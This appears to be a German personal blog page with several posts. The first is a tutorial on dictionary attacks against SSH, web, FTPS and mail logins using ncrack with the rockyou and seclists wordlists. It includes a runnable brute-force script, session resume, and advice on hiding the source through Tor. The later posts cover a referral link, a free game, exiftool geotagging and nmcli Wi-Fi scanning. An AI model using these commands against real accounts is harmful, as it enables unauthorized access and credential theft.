Tuesday, February 23, 2021

Wörterbuchangriff: SSH-, Web- und Mail-Accounts hacken mit Ncrack und Kali Linux

Mit der Wortliste rockyou hat Kali Linux etwas nettes vorgelegt :-) Doch was anfangen mit Passwort- und Benutzernamensammlungen? Accounts hacken!
In diesem Artikel will ich nun erklären, woher die unzähligen SSH-Loginversuche stammen, die tagtäglich im Log des Server auftauchen.

Die Passwort- und Benutzernamensammlungen seclists und wordlists

Die Pakete seclists und wordlists beinhalten mehrere Listen, bestehend aus Benutzernamen und Passwörtern, die mit dem Ziel erstellt wurden, einem Sicherheitstester zu ermöglichen, diese auf einen Test anzuwenden.

Mehr darüber ist auf https://tools.kali.org/password-attacks/ zu lesen.

Installiert werden die Listen mit:

apt install seclists wordlists

Die enthaltenen Listen kann man sich mit dpkg -L seclists wordlists anzeigen lassen.

Ich will mich hier auf /usr/share/seclists/Usernames/Names/names.txt und /usr/share/wordlists/rockyou.txt.gz beschränken.

Accounts hacken

Zum Accounts hacken ist Ncrack von https://nmap.org/ meine Wahl. In der Paketverwaltung im Paket ncrack zu finden.

apt install ncrack

Ziele definieren

Die Angriffsziele übergibt man mit dem Schalter -iL, welcher eine Textdatei erwartet, die zeilenweise die Ziele in der Form <service>://target[:port-number] enthält. Z.B.:

cat <<! >targets.txt
ssh://scanme.nmap.org:22
ftps://scanme.nmap.org:990
https://scanme.nmap.org:443
imaps://scanme.nmap.org:993
smtps://scanme.nmap.org:465
!

Diese Liste hackt SSH-, Web- und Mail-Accounts! Eine Liste von weiteren Services findet man unter /etc/services. Ncrack muss aber nicht alle davon unterstützen.

Mit den Schaltern -U und -P werden die Benutzernamen und Passwörter angegeben. Wieder als Textdateien, die zeilenweise Benutzernamen bzw. Passwörter enthalten.

Die Wordliste rockyou muss also noch entpackt werden:

gunzip --keep /usr/share/wordlists/rockyou.txt.gz

Hack starten

Dieses Skript startet den Hack mit ncrack(1):

#!/usr/bin/env bash
# start ncrack scan
# Code-Listing zu den Schaltern von weiter oben
set -x -e
ncrack  
    -iL targets.txt  
    -U /usr/share/seclists/Usernames/Names/names.txt  
    -P /usr/share/wordlists/rockyou.txt  
    --save session.dat  
    -oA ncrackscan.`date +%F` --append-output
    "$@"

Der Schalter --save speichert die Session, um später, z.B. nach einem beenden des Terminal oder poweroff(8) fortzusetzen.

Hack fortsetzen

Mit dem Schalter --resume kann ein mit --save gespeicherter Hack fortgesetzt werden. Es dürfen hier keine weiteren bzw. neue Parameter angegebenen werden:

#!/usr/bin/env bash
# resume ncrack scan
set -x -e
ncrack --resume session.dat

Über tor(1) hacken

Mit dem Schalter --proxy kann man, das Netzwerk zur Anonymisierung von Verbindungsdaten, Tor als SOCKS-Proxy nutzen:

apt install tor
ncrack <options…> --proxy socks4://localhost:9050

Debuggen

Zum Debuggen des Hack kennt ncrack(1) die Schalter -v (für Verbose; der mehrfach angegeben werden kann, was die Informationsmenge erhöt) und -d1 bis -d10 (für Debug; wobei 1 bis 10 die Ausführlichkeit des Log bestimmt).

Sichere Passwörter

Zum Schluss will ich noch die Kommandos pwgen -s und apg -s erwähnen. Zwei Tools, um relativ sicher Passwörter zu erstellen, die höchswahrscheinlich nicht in Passwortlisten zu finden sind. Die Tools befinden sich in den gleichnamigen Paketen.

Tuesday, November 24, 2020

Pi Network invitation code

Zuerst einmal an alle, die sich hier, über meinen Pi Network invitation code, dem Pi Network angeschlossen haben, ein riesiges Dankeschön :-)

Heute möchte ich einen zweiten Pi Network invitation code veröffentlichen.
Es ist der invitation code meiner Schwester und sie würde sich freuen, wenn Ihr sie auch in eurer Earning Team hinzufügt.

Pi ist eine neue digitale Währung mit über 8 Millionen Mitglieder weltweit, die von Stanford PhDs entwickelt wurde. Um Ihre Pi zu beanspruchen, folgen Sie diesem Link https://minepi.com/BessieMae und verwenden Sie meinen Benutzernamen (BessieMae) als Einladungscode.

Thursday, October 22, 2020

Layers of Fear 2 kostenlos bei Epic Games (Aktion beendet)

Das Adventure Layers of Fear 2 ist z.Z. kostenlos bei Epic Games erhältlich. Windows und ein Epic Games-Account sind nötig, um das Spiel zu installieren. Das Spiel bleibt dauerhaft im Account.

Teil 2 ist anders als Teil 1 bis jetzt nicht für Linux erhältlich. Da ich aber auch Teil 1 hier erwähnt hatte, möchte ich dennoch auch Teil 2 erwähnen.

www.epicgames.com schreibt:

Layers of Fear 2 ist ein psychologisches Horrorspiel aus der Ego-Perspektive mit einem Schwerpunkt auf Erkundung und Handlung. Der Spieler steuert einen Hollywood-Star, der dem Ruf eines mysteriösen Regisseurs folgt, um an Bord eines Überseedampfers die Hauptrolle in einem Film zu spielen.

Die Kameras sind alle auf dich gerichtet – diese Szene gehört dir. Du spielst nicht die Hauptfigur, du bist die Hauptfigur. Die Rolle ist allein für dich bestimmt. Nur für dich geschrieben. Es herrscht Stille. Kein Regisseur brüllt Anweisungen. Du brauchst keine Aufforderung, um zu dieser Version von dir zu werden. Du kannst an nichts anderes denken, als zu spielen, aber die Seiten des Drehbuchs sind leer.
Deine Vergangenheit hat dazu beigetragen, dich zu dem zu formen, was du bist, und dir die nötigen Fähigkeiten aufgezwungen, um dein Handwerk zu perfektionieren. Dieselbe Vergangenheit hat tiefe Spuren hinterlassen. Nicht äußerlich, für die ganze Welt erkenntlich, sondern an einem Ort, der so tief verborgen liegt, dass er seine Gestalt verloren hat. Du unterdrückst diese Erinnerungen, doch du lässt zu, dass deine Erfahrungen dich in den – oder das – verwandeln, was du spielen sollst.
Dunkelheit umgibt dich, während du still im Rampenlicht stehst. Die einzigen Geräusche, die deinen Herzschlag übertönen, sind das entfernte Brechen der Wellen, die gegen den Rumpf schlagen, und das Surren der Kameras, die auf dich gerichtet sind, um diesen Moment für immer festzuhalten.
Eine tiefe und gebieterische Stimme ertönt aus der Ferne. Spiele.
Welche Rolle wirst du spielen?

Siehe auch: https://www.epicgames.com/store/de/product/layers-of-fear-2

PS: In Teil 1 habe ich ein Ende erreicht, aber wenig auflösen können… Ich war am Ende einfach wieder im Atelier und es sah so aus, als würde ich von vorn beginnen :-/ Das Gemälde war fertig - irgendwie! Auf eine zweite Runde durchs Haus hatte ich aber (noch) keine Lust - auch wenn es cool ist…

Wednesday, September 16, 2020

Fotos anhand der GeoTags auf einer Weltkarte (Google Earth) anordnen

Das Perl Modul und Programm ExifTool von Phil Harvey, bietet die Möglichkeit, Metadaten in einer beliebigen Anzahl von Formaten auszugeben. Z.B. auch als eine GPS-Trackdatei, die nach Google Earth importiert werden kann. Super fürs Fotoalbum, mit all den Urlaubsfotos (Wenn Sie immer schön GPS an hatten).
Das Google Earth installiert ist, setze ich voraus.

PS: ExifTool kam hier mit 20000 Dateien klar!

ExifTool installieren

Das Programm exiftool(1p) ist in Debian GNU/Linux enthalten und kann über die Paketverwaltung wie folgt installiert werden:

apt install libimage-exiftool-perl

Ansonsten von CPAN installieren:

cpan Image::ExifTool # installiert nach /usr/local

GPX- und KML-Datei erstellen

Um nun aus einer Reihe von Fotos mit GeoTags eine GPX- und KML-Datei zu erstellen, müssen entsprechende Schablonen mit der Option -p an exiftool(1p) übergebenen werden:

# Creating a GPX track log
exiftool -p ~/Downloads/gpx.fmt -ee -r ~/Bilder/ ~/Videos/ > ~/out.gpx
# Creating a Google Earth KML file
exiftool -p ~/Downloads/kml.fmt -ee -r ~/Bilder/ ~/Videos/ > ~/out.kml

Die Schablonen finden Sie für GPX hier und für KML hier. Speichern Sie diese beiden Dateien am besten unter ~/Downloads/gpx.fmt und ~/Downloads/kml.fmt ab und führen Sie dann die obigen Kommandos aus.

Die zwei Beispiele, arbeiten die Verzeichnisse ~/Bilder/ und ~/Videos/ rekursiv ab. Aber es können stattdessen auch einzelne Dateien, oder Verzeichnisse und Dateien gemischt angegeben werden.

Es sollten die Dateien ~/out.gpx bzw. ~/out.kml erzeugt werden.
Letztere können Sie mit Google Earth öffnen:

google-earth-pro ~/out.kml

Mein Tipp: Geben Sie Bilder, Videos und die out.kml mit absoluter Pfadangabe an. Dann sollten diese von Google Earth auch immer gefunden werden (Ansonsten halten Sie sich an die Tipps aus den Schablonenbeschreibungen).

In diesem Beispiel habe ich ausschließlich im Home-Verzeichnis gearbeitet. So sollte die out.kml, auch korrekt über das Kontextmenü, mit Google Earth, aus dem Dateimanager heraus geöffnet werden können.

map-2020-09-16-19-38-06.png

Quellen und Weiterführendes

Sunday, August 16, 2020

NetworkManager als WLAN-Sniffer: Liste der benachbarten Access Points erhalten

Um eine Liste der benachbarten Funknetzwerke (Access Points), mit den Werten für WLAN-Name (SSID), Kanal (Channel), Signalstärke, Verschlüsselungsart usw. zu erhalten, kann man folgendes Kommando nutzen:

nmcli device wifi list --rescan yes

Anders als z.B. iwlist(8) muss nmcli(1) nicht explizit als root ausgeführt werden, um einen Rescan durchzuführen.

Für Skripte kennt nmcli(1) den Schalter -g, --get-values. Dieser soll verwendet werden, um die Werte bestimmter Felder zu erhalten. Es ist im Grunde eine Kombination aus --mode tabular, --terse und --fields und eine bequeme Möglichkeit, Werte für bestimmte Felder abzurufen.

nmcli --get-values IN-USE,BSSID,SSID,CHAN,SIGNAL,SECURITY device wifi list --rescan yes

PS: Dies ist auch in nmcli-examples(7) beschrieben.